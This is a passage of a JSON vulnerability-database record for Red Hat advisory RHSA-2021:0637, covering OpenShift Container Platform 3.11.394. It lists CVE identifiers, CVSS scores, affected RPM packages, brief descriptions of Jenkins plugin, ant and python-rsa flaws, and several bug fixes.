updated packages and images.", "published": "2021-03-03T17:05:11", "modified": "2021-03-03T17:17:55", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cvss2": {}, "cvss3": {}, "href": "https://access.redhat.com/errata/RHSA-2021:0637", "reporter": "RedHat", "references": [], "cvelist": ["CVE-2020-11979", "CVE-2020-1945", "CVE-2020-2304", "CVE-2020-2305", "CVE-2020-2306", "CVE-2020-2307", "CVE-2020-2308", "CVE-2020-2309", "CVE-2020-25658"], "immutableFields": [], "lastseen": "2021-03-03T12:34:27", "history": [], "viewCount": 39, "enchantments": {"dependencies": {"references": [{"type": "nessus", "idList": ["FEDORA_2020-92B1D001B3.NASL", "FEDORA_2020-2640AA4E19.NASL", "REDHAT-RHSA-2021-0637.NASL", "EULEROS_SA-2021-1133.NASL", "PHOTONOS_PHSA-2020-2_0-0291_APACHE.NASL", "FEDORA_2020-3CE0F55BC5.NASL", "REDHAT-RHSA-2021-0034.NASL", "REDHAT-RHSA-2021-0038.NASL", "GENTOO_GLSA-202011-18.NASL", "PHOTONOS_PHSA-2020-3_0-0155_APACHE.NASL"]}, {"type": "cve", "idList": ["CVE-2020-2307", "CVE-2020-1945", "CVE-2020-2309", "CVE-2020-2308", "CVE-2020-2305", "CVE-2020-25658", "CVE-2020-2306", "CVE-2020-11979", "CVE-2020-2304"]}, {"type": "redhat", "idList": ["RHSA-2021:0423", "RHSA-2021:0282", "RHSA-2021:0039", "RHSA-2021:0034", "RHSA-2021:0037", "RHSA-2020:2618", "RHSA-2021:0719", "RHSA-2021:0429", "RHSA-2021:0038", "RHSA-2020:5634"]}, {"type": "archlinux", "idList": ["ASA-202012-5", "ASA-202005-15"]}, {"type": "github", "idList": ["GHSA-4P6W-M9WC-C9C9", "GHSA-F62V-XPXF-3V68"]}, {"type": "gentoo", "idList": ["GLSA-202007-34", "GLSA-202011-18"]}, {"type": "fedora", "idList": ["FEDORA:88EAA30905CF", "FEDORA:146FE30DD5E7", "FEDORA:52396606732B", "FEDORA:2D51F60C28B2", "FEDORA:6869030D3139"]}, {"type": "freebsd", "idList": ["6D5F1B0B-B865-48D5-935B-3FB6EBB425FC"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310877930", "OPENVAS:1361412562310877939", "OPENVAS:1361412562310844454"]}, {"type": "ubuntu", "idList": ["USN-4380-1"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:1022-1"]}, {"type": "oracle", "idList": ["ORACLE:CPUOCT2020", "ORACLE:CPUJUL2020", "ORACLE:CPUJAN2021"]}], "modified": "2021-03-03T12:34:27", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-03-03T12:34:27", "rev": 2}}, "objectVersion": "1.4", "affectedPackage": [{"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageName": "atomic-openshift-tests", "packageVersion": "3.11.394-1.git.0.e03a88e.el7", "packageFilename": "atomic-openshift-tests-3.11.394-1.git.0.e03a88e.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageName": "golang-github-openshift-oauth-proxy", "packageVersion": "3.11.394-1.git.439.4c37707.el7", "packageFilename": "golang-github-openshift-oauth-proxy-3.11.394-1.git.439.4c37707.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageName": "atomic-openshift-metrics-server", "packageVersion": "3.11.394-1.git.53.3d82586.el7", "packageFilename": "atomic-openshift-metrics-server-3.11.394-1.git.53.3d82586.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageName": "golang-github-prometheus-prometheus", "packageVersion": "3.11.394-1.git.5026.2c9627f.el7", "packageFilename": "golang-github-prometheus-prometheus-3.11.394-1.git.5026.2c9627f.el7.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageName": "atomic-openshift-master", "packageVersion": "3.11.394-1.git.0.e03a88e.el7", "packageFilename": "atomic-openshift-master-3.11.394-1.git.0.e03a88e.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageName": "golang-github-prometheus-node_exporter", "packageVersion": "3.11.394-1.git.1062.8adc4b8.el7", "packageFilename": "golang-github-prometheus-node_exporter-3.11.394-1.git.1062.8adc4b8.el7.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageName": "golang-github-openshift-oauth-proxy", "packageVersion": "3.11.394-1.git.439.4c37707.el7", "packageFilename": "golang-github-openshift-oauth-proxy-3.11.394-1.git.439.4c37707.el7.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageName": "atomic-openshift-metrics-server", "packageVersion": "3.11.394-1.git.53.3d82586.el7", "packageFilename": "atomic-openshift-metrics-server-3.11.394-1.git.53.3d82586.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageName": "openshift-enterprise-cluster-capacity", "packageVersion": "3.11.394-1.git.379.92adfdc.el7", "packageFilename": "openshift-enterprise-cluster-capacity-3.11.394-1.git.379.92adfdc.el7.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "noarch", "packageName": "openshift-kuryr-controller", "packageVersion": "3.11.394-1.git.1490.16ed375.el7", "packageFilename": "openshift-kuryr-controller-3.11.394-1.git.1490.16ed375.el7.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageName": "atomic-openshift-sdn-ovs", "packageVersion": "3.11.394-1.git.0.e03a88e.el7", "packageFilename": "atomic-openshift-sdn-ovs-3.11.394-1.git.0.e03a88e.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageName": "atomic-openshift-sdn-ovs", "packageVersion": "3.11.394-1.git.0.e03a88e.el7", "packageFilename": "atomic-openshift-sdn-ovs-3.11.394-1.git.0.e03a88e.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageName": "haproxy-debuginfo", "packageVersion": "1.8.28-1.el7", "packageFilename": "haproxy-debuginfo-1.8.28-1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageName": "haproxy18", "packageVersion": "1.8.28-1.el7", "packageFilename": "haproxy18-1.8.28-1.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageName": "atomic-openshift-pod", "packageVersion": "3.11.394-1.git.0.e03a88e.el7", "packageFilename": "atomic-openshift-pod-3.11.394-1.git.0.e03a88e.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageName": "atomic-openshift-clients", "packageVersion": "3.11.394-1.git.0.e03a88e.el7", "packageFilename": "atomic-openshift-clients-3.11.394-1.git.0.e03a88e.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "noarch", "packageName": "openshift-ansible-docs", "packageVersion": "3.11.394-6.git.0.47ec25d.el7", "packageFilename": "openshift-ansible-docs-3.11.394-6.git.0.47ec25d.el7.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageName": "atomic-openshift-node-problem-detector", "packageVersion": "3.11.394-1.git.263.49acf3a.el7", "packageFilename": "atomic-openshift-node-problem-detector-3.11.394-1.git.263.49acf3a.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "noarch", "packageName": "openshift-ansible-roles", "packageVersion": "3.11.394-6.git.0.47ec25d.el7", "packageFilename": "openshift-ansible-roles-3.11.394-6.git.0.47ec25d.el7.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageName": "haproxy", "packageVersion": "1.8.28-1.el7", "packageFilename": "haproxy-1.8.28-1.el7.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageName": "atomic-openshift-cluster-autoscaler", "packageVersion": "3.11.394-1.git.0.1900c76.el7", "packageFilename": "atomic-openshift-cluster-autoscaler-3.11.394-1.git.0.1900c76.el7.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageName": "openshift-enterprise-autoheal", "packageVersion": "3.11.394-1.git.218.59eb597.el7", "packageFilename": "openshift-enterprise-autoheal-3.11.394-1.git.218.59eb597.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageName": "atomic-openshift", "packageVersion": "3.11.394-1.git.0.e03a88e.el7", "packageFilename": "atomic-openshift-3.11.394-1.git.0.e03a88e.el7.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageName": "golang-github-openshift-oauth-proxy", "packageVersion": "3.11.394-1.git.439.4c37707.el7", "packageFilename": "golang-github-openshift-oauth-proxy-3.11.394-1.git.439.4c37707.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageName": "atomic-openshift-clients", "packageVersion": "3.11.394-1.git.0.e03a88e.el7", "packageFilename": "atomic-openshift-clients-3.11.394-1.git.0.e03a88e.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageName": "python-rsa", "packageVersion": "4.5-3.el7", "packageFilename": "python-rsa-4.5-3.el7.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageName": "atomic-openshift", "packageVersion": "3.11.394-1.git.0.e03a88e.el7", "packageFilename": "atomic-openshift-3.11.394-1.git.0.e03a88e.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageName": "prometheus-alertmanager", "packageVersion": "3.11.394-1.git.0.1fbb64c.el7", "packageFilename": "prometheus-alertmanager-3.11.394-1.git.0.1fbb64c.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "noarch", "packageName": "openshift-ansible-test", "packageVersion": "3.11.394-6.git.0.47ec25d.el7", "packageFilename": "openshift-ansible-test-3.11.394-6.git.0.47ec25d.el7.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageName": "atomic-enterprise-service-catalog", "packageVersion": "3.11.394-1.git.1675.fdb6e0b.el7", "packageFilename": "atomic-enterprise-service-catalog-3.11.394-1.git.1675.fdb6e0b.el7.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageName": "atomic-enterprise-service-catalog", "packageVersion": "3.11.394-1.git.1675.fdb6e0b.el7", "packageFilename": "atomic-enterprise-service-catalog-3.11.394-1.git.1675.fdb6e0b.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "noarch", "packageName": "jenkins-2-plugins", "packageVersion": "3.11.1612862361-1.el7", "packageFilename": "jenkins-2-plugins-3.11.1612862361-1.el7.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageName": "atomic-openshift-descheduler", "packageVersion": "3.11.394-1.git.299.ad3a3c0.el7", "packageFilename": "atomic-openshift-descheduler-3.11.394-1.git.299.ad3a3c0.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageName": "prometheus-node-exporter", "packageVersion": "3.11.394-1.git.1062.8adc4b8.el7", "packageFilename": "prometheus-node-exporter-3.11.394-1.git.1062.8adc4b8.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageName": "atomic-openshift-service-idler", "packageVersion": "3.11.394-1.git.15.73f73cd.el7", "packageFilename": "atomic-openshift-service-idler-3.11.394-1.git.15.73f73cd.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageName": "atomic-openshift-service-idler", "packageVersion": "3.11.394-1.git.15.73f73cd.el7", "packageFilename": "atomic-openshift-service-idler-3.11.394-1.git.15.73f73cd.el7.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageName": "atomic-enterprise-service-catalog-svcat", "packageVersion": "3.11.394-1.git.1675.fdb6e0b.el7", "packageFilename": "atomic-enterprise-service-catalog-svcat-3.11.394-1.git.1675.fdb6e0b.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageName": "atomic-openshift", "packageVersion": "3.11.394-1.git.0.e03a88e.el7", "packageFilename": "atomic-openshift-3.11.394-1.git.0.e03a88e.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageName": "atomic-enterprise-service-catalog", "packageVersion": "3.11.394-1.git.1675.fdb6e0b.el7", "packageFilename": "atomic-enterprise-service-catalog-3.11.394-1.git.1675.fdb6e0b.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageName": "atomic-openshift-metrics-server", "packageVersion": "3.11.394-1.git.53.3d82586.el7", "packageFilename": "atomic-openshift-metrics-server-3.11.394-1.git.53.3d82586.el7.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageName": "atomic-openshift-pod", "packageVersion": "3.11.394-1.git.0.e03a88e.el7", "packageFilename": "atomic-openshift-pod-3.11.394-1.git.0.e03a88e.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageName": "atomic-openshift-dockerregistry", "packageVersion": "3.11.394-1.git.481.6e48246.el7", "packageFilename": "atomic-openshift-dockerregistry-3.11.394-1.git.481.6e48246.el7.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageName": "prometheus", "packageVersion": "3.11.394-1.git.5026.2c9627f.el7", "packageFilename": "prometheus-3.11.394-1.git.5026.2c9627f.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageName": "atomic-openshift-cluster-autoscaler", "packageVersion": "3.11.394-1.git.0.1900c76.el7", "packageFilename": "atomic-openshift-cluster-autoscaler-3.11.394-1.git.0.1900c76.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageName": "prometheus-alertmanager", "packageVersion": "3.11.394-1.git.0.1fbb64c.el7", "packageFilename": "prometheus-alertmanager-3.11.394-1.git.0.1fbb64c.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageName": "atomic-openshift-node", "packageVersion": "3.11.394-1.git.0.e03a88e.el7", "packageFilename": "atomic-openshift-node-3.11.394-1.git.0.e03a88e.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageName": "haproxy-debuginfo", "packageVersion": "1.8.28-1.el7", "packageFilename": "haproxy-debuginfo-1.8.28-1.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageName": "openshift-enterprise-cluster-capacity", "packageVersion": "3.11.394-1.git.379.92adfdc.el7", "packageFilename": "openshift-enterprise-cluster-capacity-3.11.394-1.git.379.92adfdc.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageName": "atomic-openshift-cluster-autoscaler", "packageVersion": "3.11.394-1.git.0.1900c76.el7", "packageFilename": "atomic-openshift-cluster-autoscaler-3.11.394-1.git.0.1900c76.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageName": "atomic-openshift-node-problem-detector", "packageVersion": "3.11.394-1.git.263.49acf3a.el7", "packageFilename": "atomic-openshift-node-problem-detector-3.11.394-1.git.263.49acf3a.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageName": "atomic-openshift-web-console", "packageVersion": "3.11.394-1.git.667.08dd2a6.el7", "packageFilename": "atomic-openshift-web-console-3.11.394-1.git.667.08dd2a6.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageName": "openshift-enterprise-cluster-capacity", "packageVersion": "3.11.394-1.git.379.92adfdc.el7", "packageFilename": "openshift-enterprise-cluster-capacity-3.11.394-1.git.379.92adfdc.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageName": "atomic-openshift-dockerregistry", "packageVersion": "3.11.394-1.git.481.6e48246.el7", "packageFilename": "atomic-openshift-dockerregistry-3.11.394-1.git.481.6e48246.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageName": "atomic-openshift-service-idler", "packageVersion": "3.11.394-1.git.15.73f73cd.el7", "packageFilename": "atomic-openshift-service-idler-3.11.394-1.git.15.73f73cd.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageName": "atomic-openshift-master", "packageVersion": "3.11.394-1.git.0.e03a88e.el7", "packageFilename": "atomic-openshift-master-3.11.394-1.git.0.e03a88e.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "noarch", "packageName": "openshift-kuryr-cni", "packageVersion": "3.11.394-1.git.1490.16ed375.el7", "packageFilename": "openshift-kuryr-cni-3.11.394-1.git.1490.16ed375.el7.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "noarch", "packageName": "openshift-kuryr-common", "packageVersion": "3.11.394-1.git.1490.16ed375.el7", "packageFilename": "openshift-kuryr-common-3.11.394-1.git.1490.16ed375.el7.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageName": "atomic-openshift-descheduler", "packageVersion": "3.11.394-1.git.299.ad3a3c0.el7", "packageFilename": "atomic-openshift-descheduler-3.11.394-1.git.299.ad3a3c0.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageName": "golang-github-prometheus-alertmanager", "packageVersion": "3.11.394-1.git.0.1fbb64c.el7", "packageFilename": "golang-github-prometheus-alertmanager-3.11.394-1.git.0.1fbb64c.el7.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageName": "atomic-openshift-clients-redistributable", "packageVersion": "3.11.394-1.git.0.e03a88e.el7", "packageFilename": "atomic-openshift-clients-redistributable-3.11.394-1.git.0.e03a88e.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "noarch", "packageName": "openshift-ansible-playbooks", "packageVersion": "3.11.394-6.git.0.47ec25d.el7", "packageFilename": "openshift-ansible-playbooks-3.11.394-6.git.0.47ec25d.el7.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageName": "atomic-openshift-template-service-broker", "packageVersion": "3.11.394-1.git.0.e03a88e.el7", "packageFilename": "atomic-openshift-template-service-broker-3.11.394-1.git.0.e03a88e.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "noarch", "packageName": "atomic-openshift-docker-excluder", "packageVersion": "3.11.394-1.git.0.e03a88e.el7", "packageFilename": "atomic-openshift-docker-excluder-3.11.394-1.git.0.e03a88e.el7.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageName": "openshift-enterprise-autoheal", "packageVersion": "3.11.394-1.git.218.59eb597.el7", "packageFilename": "openshift-enterprise-autoheal-3.11.394-1.git.218.59eb597.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageName": "atomic-openshift-hypershift", "packageVersion": "3.11.394-1.git.0.e03a88e.el7", "packageFilename": "atomic-openshift-hypershift-3.11.394-1.git.0.e03a88e.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageName": "prometheus", "packageVersion": "3.11.394-1.git.5026.2c9627f.el7", "packageFilename": "prometheus-3.11.394-1.git.5026.2c9627f.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageName": "atomic-openshift-hyperkube", "packageVersion": "3.11.394-1.git.0.e03a88e.el7", "packageFilename": "atomic-openshift-hyperkube-3.11.394-1.git.0.e03a88e.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageName": "atomic-openshift-template-service-broker", "packageVersion": "3.11.394-1.git.0.e03a88e.el7", "packageFilename": "atomic-openshift-template-service-broker-3.11.394-1.git.0.e03a88e.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageName": "atomic-openshift-hypershift", "packageVersion": "3.11.394-1.git.0.e03a88e.el7", "packageFilename": "atomic-openshift-hypershift-3.11.394-1.git.0.e03a88e.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageName": "jenkins-2-plugins", "packageVersion": "3.11.1612862361-1.el7", "packageFilename": "jenkins-2-plugins-3.11.1612862361-1.el7.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageName": "atomic-openshift-node", "packageVersion": "3.11.394-1.git.0.e03a88e.el7", "packageFilename": "atomic-openshift-node-3.11.394-1.git.0.e03a88e.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageName": "openshift-ansible", "packageVersion": "3.11.394-6.git.0.47ec25d.el7", "packageFilename": "openshift-ansible-3.11.394-6.git.0.47ec25d.el7.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "noarch", "packageName": "atomic-openshift-excluder", "packageVersion": "3.11.394-1.git.0.e03a88e.el7", "packageFilename": "atomic-openshift-excluder-3.11.394-1.git.0.e03a88e.el7.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageName": "atomic-enterprise-service-catalog-svcat", "packageVersion": "3.11.394-1.git.1675.fdb6e0b.el7", "packageFilename": "atomic-enterprise-service-catalog-svcat-3.11.394-1.git.1675.fdb6e0b.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageName": "prometheus-node-exporter", "packageVersion": "3.11.394-1.git.1062.8adc4b8.el7", "packageFilename": "prometheus-node-exporter-3.11.394-1.git.1062.8adc4b8.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageName": "openshift-enterprise-autoheal", "packageVersion": "3.11.394-1.git.218.59eb597.el7", "packageFilename": "openshift-enterprise-autoheal-3.11.394-1.git.218.59eb597.el7.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "noarch", "packageName": "jenkins", "packageVersion": "2.263.3.1612433584-1.el7", "packageFilename": "jenkins-2.263.3.1612433584-1.el7.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "noarch", "packageName": "python2-kuryr-kubernetes", "packageVersion": "3.11.394-1.git.1490.16ed375.el7", "packageFilename": "python2-kuryr-kubernetes-3.11.394-1.git.1490.16ed375.el7.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageName": "atomic-openshift-web-console", "packageVersion": "3.11.394-1.git.667.08dd2a6.el7", "packageFilename": "atomic-openshift-web-console-3.11.394-1.git.667.08dd2a6.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageName": "atomic-openshift-web-console", "packageVersion": "3.11.394-1.git.667.08dd2a6.el7", "packageFilename": "atomic-openshift-web-console-3.11.394-1.git.667.08dd2a6.el7.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "noarch", "packageName": "openshift-ansible", "packageVersion": "3.11.394-6.git.0.47ec25d.el7", "packageFilename": "openshift-ansible-3.11.394-6.git.0.47ec25d.el7.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageName": "openshift-kuryr", "packageVersion": "3.11.394-1.git.1490.16ed375.el7", "packageFilename": "openshift-kuryr-3.11.394-1.git.1490.16ed375.el7.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageName": "jenkins", "packageVersion": "2.263.3.1612433584-1.el7", "packageFilename": "jenkins-2.263.3.1612433584-1.el7.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageName": "atomic-openshift-node-problem-detector", "packageVersion": "3.11.394-1.git.263.49acf3a.el7", "packageFilename": "atomic-openshift-node-problem-detector-3.11.394-1.git.263.49acf3a.el7.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageName": "atomic-openshift-tests", "packageVersion": "3.11.394-1.git.0.e03a88e.el7", "packageFilename": "atomic-openshift-tests-3.11.394-1.git.0.e03a88e.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "noarch", "packageName": "python2-rsa", "packageVersion": "4.5-3.el7", "packageFilename": "python2-rsa-4.5-3.el7.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageName": "haproxy18", "packageVersion": "1.8.28-1.el7", "packageFilename": "haproxy18-1.8.28-1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageName": "atomic-openshift-hyperkube", "packageVersion": "3.11.394-1.git.0.e03a88e.el7", "packageFilename": "atomic-openshift-hyperkube-3.11.394-1.git.0.e03a88e.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageName": "atomic-openshift-descheduler", "packageVersion": "3.11.394-1.git.299.ad3a3c0.el7", "packageFilename": "atomic-openshift-descheduler-3.11.394-1.git.299.ad3a3c0.el7.src.rpm", "operator": "lt"}], "vendorCvss": {}}, "lastseen": "2021-03-03T12:34:27", "differentElements": ["cvelist", "cvss", "modified"], "edition": 1}, {"bulletin": {"id": "RHSA-2021:0637", "hash": "61d98b371cfd9d4ffe547a10ff7c4dae", "type": "redhat", "bulletinFamily": "unix", "title": "(RHSA-2021:0637) Important: OpenShift Container Platform 3.11.394 bug fix and security update", "description": "Red Hat OpenShift Container Platform is Red Hat's cloud computing\nKubernetes application platform solution designed for on-premise or private\ncloud deployments.\n\nSecurity Fix(es):\n\n* jenkins-2-plugins/subversion: XML parser is not preventing XML external entity (XXE) attacks (CVE-2020-2304)\n\n* jenkins-2-plugins/mercurial: XML parser is not preventing XML external entity (XXE) attacks (CVE-2020-2305)\n\n* ant: Insecure temporary file vulnerability (CVE-2020-1945)\n\n* jenkins-2-plugins/mercurial: Missing permission check in an HTTP endpoint could result in information disclosure (CVE-2020-2306)\n\n* jenkins-2-plugins/kubernetes: Jenkins controller environment variables are accessible in Kubernetes plug-in (CVE-2020-2307)\n\n* jenkins-2-plugins/kubernetes: Missing permission check in Kubernetes Plugin allows listing pod templates (CVE-2020-2308)\n\n* jenkins-2-plugins/kubernetes: Missing permission check in Kubernetes plug-in allows enumerating credentials IDs (CVE-2020-2309)\n\n* ant: Insecure temporary file (CVE-2020-11979)\n\n* python-rsa: Bleichenbacher timing oracle attack against RSA decryption (CVE-2020-25658)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section.\n\nThis advisory contains the RPM packages for Red Hat OpenShift Container\nPlatform 3.11.394. See the following advisory for the container images for this release:\n\nhttps://access.redhat.com/errata/RHBA-2021:0638\n\nSpace precludes documenting all of the container images in this advisory. See the following Release Notes documentation, which will be updated shortly for this release, for details about these changes:\n\nhttps://docs.openshift.com/container-platform/3.11/release_notes/ocp_3_11_release_notes.html\n\nThis update fixes the following bugs among others:\n\n* Previously, the restart-cluster playbook did not evaluate the defined cluster size for ops clusters. This was causing come clusters to never complete their restart. This bug fix passes the logging ops cluster size, allowing restarts of ops clusters to complete successfully. (BZ#1879407)\n\n* Previously, the `openshift_named_certificates` role checked the contents of the `ca-bundle.crt` file during cluster installation. This caused the check to fail during initial installation because the `ca-bundle.crt` file is not yet created in that scenario. This bug fix allows the cluster to skip checking the `ca-bundle.crt` file if it does not exist, resulting in initial installations succeeding. (BZ#1920567)\n\n* Previously, if the `openshift_release` attribute was not set in the Ansible inventory file, the nodes of the cluster would fail during an upgrade. This was caused by the `cluster_facts.yml` file being gathered before the `openshift_release` attribute was defined by the upgrade playbook. Now the `cluster_facts.yml` file is gathered after the `openshift_version` role runs and the `openshift_release` attribute is set, allowing for successful node upgrades. (BZ#1921353)\n\nAll OpenShift Container Platform 3.11 users are advised to upgrade to these updated packages and images.", "published": "2021-03-03T17:05:11", "modified": "2021-03-30T18:34:36", "cvss": {"score": 6.0, "vector": 